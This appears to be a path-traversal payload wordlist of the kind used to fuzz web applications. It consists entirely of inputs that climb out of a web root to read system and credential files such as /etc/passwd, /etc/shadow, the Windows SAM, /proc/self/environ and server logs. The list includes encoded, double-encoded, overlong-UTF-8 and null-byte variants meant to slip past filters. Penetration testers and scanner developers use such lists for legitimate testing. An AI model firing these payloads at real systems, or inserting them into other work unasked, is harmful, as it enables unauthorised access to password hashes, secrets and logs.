../../../../etc/passwd
..\..\..\..\windows\system32\drivers\etc\hosts
../../../etc/shadow
....//....//....//....//etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
....%2f....%2f....%2f....%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%255c..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts
/etc/passwd%00
c:\windows\system32\drivers\etc\hosts%00
../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
../../../etc/passwd%00
..\..\..\windows\system32\drivers\etc\hosts%00
../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
../../../etc/passwd
..\..\..\windows\system32\drivers\etc\hosts
../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
../../../../../../../../../../../../etc/shadow
..\..\..\..\..\..\..\..\..\..\windows\system32\config\SAM
../../../../../../../../../../../../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../../../proc/self/environ
..\..\..\..\..\..\..\..\..\..\proc\self\environ
../../../../../../../../../../../../proc/version
..\..\..\..\..\..\..\..\..\..\proc\version
../../../../../../../../../../../../var/log/apache2/access.log
..\..\..\..\..\..\..\..\..\..\var\log\apache2\access.log
../../../../../../../../../../../../var/log/apache/access.log
..\..\..\..\..\..\..\..\..\..\var\log\apache\access.log
../../../../../../../../../../../../var/log/httpd/access_log
..\..\..\..\..\..\..\..\..\..\var\log\httpd\access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
..\..\..\..\..\..\..\..\..\..\usr\local\apache\logs\access.log
../../../../../../../../../../../../var/log/vsftpd.log
..\..\..\..\..\..\..\..\..\..\var\log\vsftpd.log
../../../../../../../../../../../../var/log/sshd.log
..\..\..\..\..\..\..\..\..\..\var\log\sshd.log
../../../../../../../../../../../../var/log/mail
..\..\..\..\..\..\..\..\..\..\var\log\mail
../../../../../../../../../../../../proc/self/cmdline
..\..\..\..\..\..\..\..\..\..\proc\self\cmdline
../../../../../../../../../../../../proc/self/stat
..\..\..\..\..\..\..\..\..\..\proc\self\stat
../../../../../../../../../../../../proc/self/status
..\..\..\..\..\..\..\..\..\..\proc\self\status
../../../../../../../../../../../../proc/self/fd/0
..\..\..\..\..\..\..\..\..\..\proc\self\fd\0
../../../../../../../../../../../../proc/self/fd/1
..\..\..\..\..\..\..\..\..\..\proc\self\fd\1
../../../../../../../../../../../../proc/self/fd/2
..\..\..\..\..\..\..\..\..\..\proc\self\fd\2
../../../../../../../../../../../../proc/self/fd/255
..\..\..\..\..\..\..\..\..\..\proc\self\fd\255
